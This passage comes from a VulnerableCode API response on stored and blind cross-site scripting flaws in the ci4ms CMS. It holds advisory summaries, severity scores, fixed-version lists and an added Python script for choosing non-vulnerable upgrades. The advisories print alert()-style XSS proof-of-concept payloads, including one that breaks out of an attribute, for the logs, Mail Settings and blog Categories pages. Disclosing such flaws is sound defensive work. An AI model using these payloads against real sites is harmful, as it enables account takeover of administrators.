Full compromise of the entire application\n\nEndpoints:\n- `/backend/logs/`\n- `/backend/backup/restore/{payload}`\n- Any other endpoint that logs xss payloads there\n\n## Steps To Reproduce (POC)\n1. Trigger an endpoint that logs user-controlled input, such as:\n   `/backend/backup/restore/<img src=x onerror=alert(document.domain)>`\n2. Ensure the request generates an error and the payload is written into application logs\n3. Navigate to the logs interface as an administrator\n4. View the logged entry\n5. Notice the XSS payload executing automatically (Blind XSS)\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/jRN3nDSR#wJCwyFhbeT-OYAwlaTD_7j6wc5wRgz1EGJL0bnuhHxY",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34560",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06563",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06551",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06562",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07704",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34560"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:58:43Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:58:43Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34560",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34560"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r4v5-rwr2-q7r4",
                    "reference_id": "GHSA-r4v5-rwr2-q7r4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r4v5-rwr2-q7r4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34560",
                "GHSA-r4v5-rwr2-q7r4"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4qss-f4ym-bbeh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89851?format=api",
            "vulnerability_id": "VCID-6nzs-j8gz-9ucu",
            "summary": "CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS\nAn attacker can achieve Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section which allows the injection of XSS payloads",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35035",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05914",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05863",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05907",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05906",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35035"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.2.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.2.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5ghq-42rg-769x",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:46:26Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5ghq-42rg-769x"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35035",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35035"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5ghq-42rg-769x",
                    "reference_id": "GHSA-5ghq-42rg-769x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5ghq-42rg-769x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126169?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1011698?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/111070?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-35035",
                "GHSA-5ghq-42rg-769x"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6nzs-j8gz-9ucu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91345?format=api",
            "vulnerability_id": "VCID-7eme-yx6r-63ad",
            "summary": "ci4-cms-erp/ci4ms: System Settings (Mail Settings) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Mail Settings (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Mail Settings Configuration Fields\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Mail Settings**. Several configuration fields, including **Mail Server, Mail Port, Email Address, Email Password, Mail Protocol, and TLS settings**, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nUnlike public-facing XSS that executes on landing pages, this vulnerability executes immediately on the same settings page. The injected payload breaks out of the HTML attribute context and is interpreted by the browser when rendered, resulting in same-page DOM-based XSS.\n\nThis represents different functionality and a separate vulnerability from landing-page injection.\n\n### Example Affected Fields\n- Mail Server: `test`\n- Mail Port: `465`\n- Email Address: `simple@gmail.com`\n- Email Password: (any input)\n- Mail Protocol: `SMTP`\n- Domain: `simple@domain.com`\n\n### Affected Functionality\n- System Settings – Mail Settings configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of mail configuration values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Mail Settings fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page.\n- The script executes in the browser context of the authenticated user managing Mail Settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Mail Settings)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Mail Settings\n2. Insert the following XSS payload into any Mail Settings field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n- Never use .html() or any innerHTML-style sinks for user-controlled input in PHP or JavaScript.\n- Apply proper **HTML encoding and input sanitization** for all configuration fields.\n- Enforce CSP, HttpOnly, SameSite, and Secure flags for cookies to reduce the severity of XSS and potential CSRF escalation.\n- Audit all other system settings fields for similar attribute injection vulnerabilities.\n\n# Ready Video POC:\nhttps://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27599",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10016",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10421",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10507",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10545",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27599"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-66m2-v9v9-95c3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:08:02Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-66m2-v9v9-95c3"
                },
                {
                    "reference_url": "https://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27599",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27599"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-66m2-v9v9-95c3",
                    "reference_id": "GHSA-66m2-v9v9-95c3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-66m2-v9v9-95c3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-27599",
                "GHSA-66m2-v9v9-95c3"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7eme-yx6r-63ad"
        },
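A practitioner reading the `fixed_packages` list of the entry above should not take the first entry as the upgrade target: `0.31.0.0` closes VCID-7eme-yx6r-63ad but is itself marked `is_vulnerable: true` with thirteen other VCIDs, while `0.31.0` and `0.31.0+0` (the latter percent-encoded as `0.31.0%2B0` in its purl) are marked clean. The following Python is an added example, not part of VulnerableCode or ci4ms. It works on a constructed, trimmed-down record that mirrors the response shape on this page (the VCID, aliases and purls are copied from the page; the shortened reference and fixed-package lists are illustrative), picks only upgrade targets the database does not itself flag as vulnerable, and reports the highest numeric CVSS 3.1 score found in the references, ignoring qualitative, SSVC and EPSS entries that are not comparable with a base score.

```python
"""Choose a genuinely non-vulnerable upgrade target from a VulnerableCode
package record.  Added example; not VulnerableCode or ci4ms code."""
from __future__ import annotations

import json
from urllib.parse import unquote

# Constructed sample mirroring the /api/packages/<id> response shape on this
# page.  The VCID, aliases and purls come from the page; the reference and
# fixed_packages lists are trimmed for the example.
SAMPLE_RECORD = json.loads(r"""
{
  "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.25.1.0",
  "is_vulnerable": true,
  "affected_by_vulnerabilities": [
    {
      "vulnerability_id": "VCID-7eme-yx6r-63ad",
      "aliases": ["CVE-2026-27599", "GHSA-66m2-v9v9-95c3"],
      "references": [
        {
          "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-66m2-v9v9-95c3",
          "scores": [
            {"value": "4.7", "scoring_system": "cvssv3.1",
             "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},
            {"value": "9.1", "scoring_system": "cvssv3.1",
             "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},
            {"value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": ""},
            {"value": "Track", "scoring_system": "ssvc",
             "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:08:02Z/"}
          ]
        }
      ],
      "fixed_packages": [
        {"purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true,
         "affected_by_vulnerabilities": [{"vulnerability": "VCID-2v9s-x9dt-8ugb"},
                                         {"vulnerability": "VCID-8x3z-1p5j-6qfa"}]},
        {"purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false,
         "affected_by_vulnerabilities": []}
      ]
    }
  ]
}
""")


def cvss_scores(vuln: dict) -> list[tuple[float, str, str]]:
    """All numeric CVSS v3.1 scores in a vulnerability's references, highest first.

    Each tuple is (score, vector, reference_url).  Qualitative ratings
    (cvssv3.1_qr), SSVC decisions and EPSS probabilities are skipped: they
    are not base scores and must not be compared with them.
    """
    found = []
    for ref in vuln.get("references", []):
        for score in ref.get("scores", []):
            if score.get("scoring_system") != "cvssv3.1":
                continue
            try:
                value = float(score["value"])
            except (KeyError, ValueError):
                continue
            found.append((value, score.get("scoring_elements", ""), ref.get("reference_url", "")))
    return sorted(found, reverse=True)


def highest_cvss(vuln: dict) -> float | None:
    scores = cvss_scores(vuln)
    return scores[0][0] if scores else None


def decode_purl(purl: str) -> str:
    """purls in this API carry percent-encoded version strings ('%2B' for '+')."""
    return unquote(purl)


def safe_upgrades(vuln: dict) -> list[str]:
    """Fixed packages that the database itself marks as not vulnerable."""
    return [decode_purl(p["purl"]) for p in vuln.get("fixed_packages", [])
            if not p.get("is_vulnerable", True)]


def risky_upgrades(vuln: dict) -> dict[str, list[str]]:
    """Fixed packages that close this VCID but are still affected by others.

    A missing is_vulnerable flag is treated as vulnerable (conservative)."""
    return {decode_purl(p["purl"]): [a["vulnerability"] for a in p.get("affected_by_vulnerabilities", [])]
            for p in vuln.get("fixed_packages", []) if p.get("is_vulnerable", True)}


def triage(record: dict) -> list[dict]:
    """One row per vulnerability: ids, worst CVSS, and where to upgrade to."""
    rows = []
    for vuln in record.get("affected_by_vulnerabilities", []):
        rows.append({
            "vcid": vuln["vulnerability_id"],
            "aliases": vuln.get("aliases", []),
            "highest_cvss": highest_cvss(vuln),
            "safe_upgrades": safe_upgrades(vuln),
            "risky_upgrades": risky_upgrades(vuln),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_RECORD):
        print(json.dumps(row, indent=2))
```

Run against a full record, `triage()` produces one row per VCID; the upgrade decision should be driven by `safe_upgrades`, and `risky_upgrades` explains why a version that "fixes" the CVE at hand is still not a stopping point.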
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89003?format=api",
            "vulnerability_id": "VCID-8hmq-7f3h-fyfw",
            "summary": "CI4MS: Blogs Posts (Categories) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n# Summary  \n### **Vulnerability: Blogs Posts (Categories) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS**\n- Stored Cross-Site Scripting via Unsanitized Blog Post Content in Blog Management (Categories)\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog posts within the **Categories** section. An attacker can inject a malicious JavaScript payload into the **Categories** content, which is then stored server-side.\n\nThis stored payload is later rendered unsafely when the **Categories** are viewed via blog posts, without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog post **Categories** creation functionality\n- Blog post **Categories** editing functionality\n- Blog post **Categories** storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog post **Category** to include a malicious XSS payload in the category description or name.\n- The application stores this content without sanitization or encoding.\n- The payload persists and executes whenever the category is viewed within the blog posts section, leading to the execution of arbitrary JavaScript in the victim’s browser.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users within the **Categories** functionality\n- Full administrator account takeover through **Categories** access\n- Full account takeover across all roles via **Categories** pages\n- Full compromise of the entire application via XSS in **Categories**\n\n**Endpoints:**\n- `/backend/blogs/create` (Categories specific)\n- `/backend/blogs/` (Categories view)\n- `/blog/{id}` (Rendered blog post under Categories)\n\n## Steps To Reproduce (POC)\n1. Go to the **Categories** section of the blog management panel.\n2. Create a new category or edit an existing category.\n3. Insert an XSS payload into the category content, such as:\n`<img src=x onerror=alert(document.domain)>`\n4. Save or publish the Categories.\n5. View the category via the blog posts in the administrative panel or public blog page under the Categories section.\n6. Notice the XSS payload executing automatically when the Category is viewed in the Blog Posts.\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all 